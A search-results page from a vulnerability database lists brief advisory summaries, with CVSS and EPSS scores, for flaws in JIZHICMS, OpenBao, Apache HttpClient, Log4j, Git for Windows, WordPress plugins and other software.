Lucene search
K

569 matches found

CNNVD
CNNVD
added 2026/04/25 12:0 a.m.8 views

JIZHICMS 注入漏洞

JIZHICMS is an open-source content management system developed by JIZHI Corporation in China. Versions of JIZHICMS 2.5.6 and earlier had a vulnerability related to SQL injection. This vulnerability stemmed from improper handling of parameters in the htmlspecialcharsdecode function located at...

5.8CVSS5.9AI score0.00253EPSS
Exploits0References2
Positive Technologies
Positive Technologies
added 2026/04/23 12:0 a.m.10 views

PT-2026-34666

Jizhicms v2.5.4 is vulnerable to SQL injection in the product editing module...

5.8AI score0.00359EPSS
Exploits1References5
Github Security Blog
Github Security Blog
added 2026/04/22 9:31 a.m.11 views

Apache HttpClient accepts SCRAM-SHA-256 authentication without proper mutual authentication verification

Missing critical step in authentication in Apache HttpClient 5.6 allows an attacker to cause the client to accept SCRAM-SHA-256 authentication without proper mutual authentication verification. Users are recommended to upgrade to version 5.6.1, which fixes this issue...

7.3CVSS5.2AI score0.00456EPSS
Exploits0References5Affected Software1
Vulnrichment
Vulnrichment
added 2026/04/21 8:30 p.m.5 views

CVE-2026-6796 Sanluan PublicCMS Failed Login LoginAdminController.java log_login cleartext storage in file

A vulnerability was determined in Sanluan PublicCMS up to 6.202506.d. Affected is the function loglogin of the file core/src/main/java/com/publiccms/controller/admin/LoginAdminController.java of the component Failed Login Handler. This manipulation of the argument errorPassword causes cleartext...

5.3CVSS5.5AI score0.00147EPSS
Exploits0References3
OSV
OSV
added 2026/04/21 6:27 p.m.2 views

GHSA-P49J-V9WC-WG57 OpenBao's Token Store Allows Cross-Namespace Renewal, Revocation

Impact OpenBao's namespaces provide multi-tenant separation. A tenant who leaks token accessors can have their token revoked or renewed by a privileged administrator in another tenant. Patches This was addressed in v2.5.3...

2CVSS5.8AI score0.00301EPSS
Exploits0References6
EUVD
EUVD
added 2026/04/21 6:26 p.m.6 views

EUVD-2026-24035

OpenBao's SQL Injection in PostgreSQL database secrets engine...

4.6CVSS5.8AI score0.00235EPSS
Exploits0References5
Github Security Blog
Github Security Blog
added 2026/04/21 5:26 p.m.10 views

OpenBao's Certificate Authentication Allows Token Renewal With Different Certificate

Background OpenBao's Certificate authentication method, when a token renewal is requested and disablebinding=true is set, attempts to verify the current request's presented mTLS certificate matches the original. Token renewals for other authentication methods do not require any supplied login...

3.1CVSS5.6AI score0.00101EPSS
Exploits0References6Affected Software1
ATTACKERKB
ATTACKERKB
added 2026/04/21 12:19 a.m.3 views

CVE-2026-39946

OpenBao is an open source identity-based secrets management system. Prior to version 2.5.3, when OpenBao revoked privileges on a role in the PostgreSQL database secrets engine, OpenBao failed to use proper database quoting on schema names provided by PostgreSQL. This could lead to role revocation...

4.6CVSS5.8AI score0.00235EPSS
Exploits0References2Affected Software1
EUVD
EUVD
added 2026/04/15 5:26 p.m.7 views

EUVD-2026-22991

Git for Windows is the Windows port of Git. Versions prior to 2.53.0.windows.3 do not have protections that prevent attackers from obtaining a user's NTLM hash. The NTLM hash can be obtained by tricking users into cloning a malicious repository, or checking out a malicious branch, that accesses a...

7.4CVSS5.8AI score0.00316EPSS
Exploits0References5
Tenable Nessus
Tenable Nessus
added 2026/04/14 12:0 a.m.5 views

RockyLinux 8 : ruby:2.5 (RLSA-2023:7025)

The remote RockyLinux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the RLSA-2023:7025 advisory. ruby/cgi-gem: HTTP response splitting in CGI CVE-2021-33621 ruby: Buffer overrun in String-to-Float conversion CVE-2022-28739 ruby: ReDoS vulnerability i...

8.8CVSS7AI score0.04127EPSS
Exploits1References9
OSV
OSV
added 2026/04/10 4:16 p.m.7 views

DEBIAN-CVE-2026-34480

Apache Log4j Core's XmlLayout https://logging.apache.org/log4j/2.x/manual/layouts.htmlXmlLayout , in versions up to and including 2.25.3, fails to sanitize characters forbidden by the XML 1.0 specification https://www.w3.org/TR/xml/charsets producing invalid XML output whenever a log message or M...

7.5CVSS5.3AI score0.0086EPSS
Exploits0References1
OSV
OSV
added 2026/04/10 4:16 p.m.9 views

UBUNTU-CVE-2026-34480

Apache Log4j Core's XmlLayout https://logging.apache.org/log4j/2.x/manual/layouts.htmlXmlLayout , in versions up to and including 2.25.3, fails to sanitize characters forbidden by the XML 1.0 specification https://www.w3.org/TR/xml/charsets producing invalid XML output whenever a log message or M...

7.5CVSS5.7AI score0.0086EPSS
Exploits0References8
RedhatCVE
RedhatCVE
added 2026/04/09 7:23 p.m.5 views

CVE-2026-39662

Missing Authorization vulnerability in ProWCPlugins Product Price by Formula for WooCommerce product-price-by-formula-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Product Price by Formula for WooCommerce: from n/a through = 2.5.6...

5.3CVSS5.9AI score0.0019EPSS
Exploits0References1
NVD
NVD
added 2026/04/08 9:16 a.m.3 views

CVE-2026-39662

Missing Authorization vulnerability in ProWCPlugins Product Price by Formula for WooCommerce product-price-by-formula-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Product Price by Formula for WooCommerce: from n/a through = 2.5.6...

5.3CVSS0.0019EPSS
Exploits0References1
CVE
CVE
added 2026/04/08 8:30 a.m.10 views

CVE-2026-39710

CVE-2026-39710 affects WordPress RT-Theme 18 | Extensions (rt18-extensions) up to version 2.5. The issue is a CSRF vulnerability that could allow actions on behalf of authenticated users. The root cause and affected component are described across multiple feeds; the primary fix recommended is upd...

5.4CVSS5.9AI score0.00097EPSS
Exploits0References1
ATTACKERKB
ATTACKERKB
added 2026/04/08 8:30 a.m.3 views

CVE-2026-39641

Cross-Site Request Forgery CSRF vulnerability in Skywarrior Blackfyre blackfyre allows Cross Site Request Forgery.This issue affects Blackfyre: from n/a through = 2.5.4...

5.9AI score0.00169EPSS
Exploits0References2
Cvelist
Cvelist
added 2026/04/08 8:30 a.m.21 views

CVE-2026-39641 WordPress Blackfyre theme <= 2.5.4 - Cross Site Request Forgery (CSRF) vulnerability

Cross-Site Request Forgery CSRF vulnerability in Skywarrior Blackfyre blackfyre allows Cross Site Request Forgery.This issue affects Blackfyre: from n/a through = 2.5.4...

6.5CVSS0.00169EPSS
Exploits0References1
Positive Technologies
Positive Technologies
added 2026/04/08 12:0 a.m.5 views

PT-2026-31441

Tophat is a mobile applications testing harness. Prior to 2.5.1, Tophat is affected by remote code execution via crafted tophat:// or http://localhost:29070 URLs. The arguments query parameter flows unsanitized from URL parsing through to /bin/bash -c execution, allowing an attacker to execute...

8.7CVSS6.7AI score0.00555EPSS
Exploits0References3
CVE
CVE
added 2026/04/07 8:57 a.m.12 views

CVE-2026-34903

The CVE-2026-34903 entry describes a Missing Authorization vulnerability in OceanWP Ocean Extra, affecting Ocean Extra up to version 2.5.3. The issue is categorized as a Broken Access Control with CVSS 3.1 base score 5.4 (Network, Low Privileges Required, No User Interaction, Confidentiality None...

5.4CVSS5.9AI score0.00293EPSS
Exploits0References1
RedhatCVE
RedhatCVE
added 2026/04/01 11:0 p.m.9 views

CVE-2026-34405

Nuxt OG Image generates OG Images with Vue templates in Nuxt. Prior to version 6.2.5, the image‑generation component by the URI: /og/d/ and, in older versions, /og-image/ contains a vulnerability that allows injection of arbitrary attributes into the HTML page body. This issue has been patched in...

6.1CVSS5.9AI score0.00216EPSS
Exploits1References1
Rows per page
Query Builder